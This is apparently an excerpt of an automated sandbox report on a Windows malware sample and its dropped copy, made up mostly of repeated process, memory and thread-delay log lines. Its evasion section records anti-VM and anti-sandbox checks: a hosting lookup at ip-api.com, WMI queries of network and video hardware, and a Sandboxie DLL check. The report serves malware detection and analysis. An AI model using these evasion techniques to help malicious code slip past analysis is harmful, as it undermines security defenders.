                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: GestorRemesasCONFIRMIMING.exe PID: 3892, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: XNYbGrcoFr.exe PID: 5096, type: MEMORYSTR
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000B.00000002.2167592562.0000000003B11000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.0000000003065000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4534286428.0000000000436000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeMemory allocated: BC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeMemory allocated: 2580000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeMemory allocated: 4580000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeMemory allocated: 8920000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeMemory allocated: 9920000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeMemory allocated: 9C30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeMemory allocated: AC30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeMemory allocated: 1050000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeMemory allocated: 2AC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeMemory allocated: 2880000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeMemory allocated: 2520000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeMemory allocated: 27D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeMemory allocated: 2520000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeMemory allocated: 8A40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeMemory allocated: 6A20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeMemory allocated: 9A40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeMemory allocated: AA40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeMemory allocated: 1220000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeMemory allocated: 3000000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeMemory allocated: 2E20000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 599856Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 599726Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 599624Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 599475Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 599326Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 599167Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 598999Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 598887Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 598780Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 598670Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 596140Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 596031Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 595922Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 595812Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 595703Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 595593Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 595484Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 595375Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 595266Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 595048Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 594930Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 594828Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 594718Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 594609Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 594500Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 594382Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 594281Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 594172Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 594062Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 593953Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 593844Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 593719Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 593609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 599891
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 599781
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 599672
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 599563
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 599438
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 599328
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 599218
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 599110
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 598737
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 596597
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 596266
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 596141
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 596031
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 595922
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 595813
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 595688
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 595563
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 595453
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 595344
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 595219
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 595109
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 595000
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 594891
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 594781
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 594672
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 594563
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 594438
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 594327
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 594219
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 594094
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 593985
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 593860
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6036Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5609Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeWindow / User API: threadDelayed 3848Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeWindow / User API: threadDelayed 5849Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeWindow / User API: threadDelayed 1408
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeWindow / User API: threadDelayed 8440
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 6740Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5708Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2612Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2356Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5196Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep count: 34 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 4136Thread sleep count: 3848 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -599856s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -599726s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -599624s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -599475s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -599326s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -599167s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -598999s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -598887s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -598780s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -598670s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 4136Thread sleep count: 5849 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -99859s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -99750s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -99640s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -99531s >= -30000sJump to behavior
